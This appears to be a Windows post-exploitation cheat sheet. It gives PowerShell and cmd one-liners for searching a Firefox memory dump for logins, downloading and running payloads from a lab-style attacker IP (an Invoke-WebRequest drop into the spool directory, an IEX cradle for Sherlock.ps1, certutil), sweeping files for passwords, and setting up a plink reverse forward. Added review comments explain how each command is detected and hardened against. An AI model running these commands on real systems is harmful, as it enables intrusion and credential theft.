Windows

Powershell

Searching

# Finds the named dump file and prints every line in it that contains "login".
# -File restricts Get-ChildItem to files and -Recurse descends into subdirectories;
# Select-String then reads each file it receives (matching is case-insensitive by default).
# NOTE(review): the file name suggests a Firefox process memory dump - confirm. Such dumps
# can hold credentials in cleartext, so they should be access-controlled like any other
# secret and removed once analysis is finished.
Get-ChildItem -Path "C:\Users\Chase\Desktop\2104firefox.dmp" -Recurse -File | Select-String login

Download

# Starts a new PowerShell process that fetches a binary over plain HTTP and writes it to disk.
# -exec bypass skips execution-policy checks for this one process; execution policy is a
# safety setting rather than a security boundary, so it should not be counted on to stop this.
# The transfer is unauthenticated HTTP and nothing checks a hash or signature on the result.
# The destination sits below %WINDIR% in a directory that standard users can typically write
# to, so application-control path rules that trust everything under %WINDIR% need an explicit
# exception for it.
# Detection: process-creation logging with command lines (Security event 4688, Sysmon event 1)
# records the whole one-liner, and file-creation telemetry (Sysmon event 11) shows an .exe
# appearing in a directory that normally holds only colour profiles.
powershell.exe -exec bypass -command "Invoke-WebRequest 'http://10.10.14.18:8888/41020.exe' -OutFile 'C:\windows\system32\spool\drivers\color\41020.exe'"

Execution

# Download cradle: DownloadString fetches Sherlock.ps1 over HTTP as text and IEX
# (Invoke-Expression) evaluates it, so the script runs in memory without being saved to disk.
# NOTE(review): Find-AllVulns and its -Command argument are defined by the downloaded script,
# which is not shown here - confirm what they do against that script.
# Visibility: because no file is written, on-disk scanning does not see the script; AMSI and
# PowerShell script block logging (event 4104) receive its text after download, and
# process-creation logs show the IEX/DownloadString pair on the command line.
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.18:8888/Sherlock.ps1'); Find-AllVulns -Command 'start powershell.exe'"

Recursively list the accessible files

# Walks the current directory tree and emits the full path of every matching item.
# The *.* pattern goes through PowerShell's wildcard matcher, so names without a dot are skipped.
# Directories the current account cannot open produce access-denied errors instead of output,
# which makes the listing a quick view of what that account can actually reach.
Get-ChildItem -Recurse -Include *.* | Select-Object -Property FullName
Command Line

Search for a file

REM Look for abc.txt in the current directory and all subdirectories (/s), pausing after each screen (/p).
dir abc.txt /s /p
REM Case-insensitive (/i), recursive (/s) search of every file for the string "password".
REM Hits are usually scripts, answer files or configuration files that store credentials in
REM cleartext; running the same sweep during hardening finds them before an intruder does.
findstr /i /s "password" *.*
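REM Answer the prompt message with "y": the piped "y" is read by plink in place of keyboard input.
REM NOTE(review): if that prompt is plink's unknown-host-key question, this accepts whatever
REM key the server presents, so the server's identity is never verified - confirm.
REM Options use an ASCII hyphen; the typographic dashes in the original are not option prefixes.
REM -pw places the password on the command line, where process listings and command-line
REM auditing (Security event 4688, Sysmon event 1) record it in cleartext.
REM The page gives no forwarding specification after -R and no target host, so the command
REM is incomplete as written.
REM Detection: plink.exe started with -R (remote port forwarding) and making an outbound SSH
REM connection from a workstation or server is worth alerting on.
cmd.exe /c echo y | plink.exe -ssh -l username -pw password -R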

Download a file

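REM certutil is the built-in Windows certificate utility; -urlcache with -f fetches the URL
REM and writes the response to the named output file. "ip" and "file" are placeholders.
REM The switch is a single token, -urlcache, with no space after the dash.
REM Detection: certutil.exe launched with -urlcache and an http(s) URL is rarely legitimate
REM administration and is a common endpoint-detection rule; each fetch also leaves a cached
REM copy and metadata under the user's CryptnetUrlCache directory, which is useful in forensics.
certutil.exe -urlcache -split -f http://ip/file file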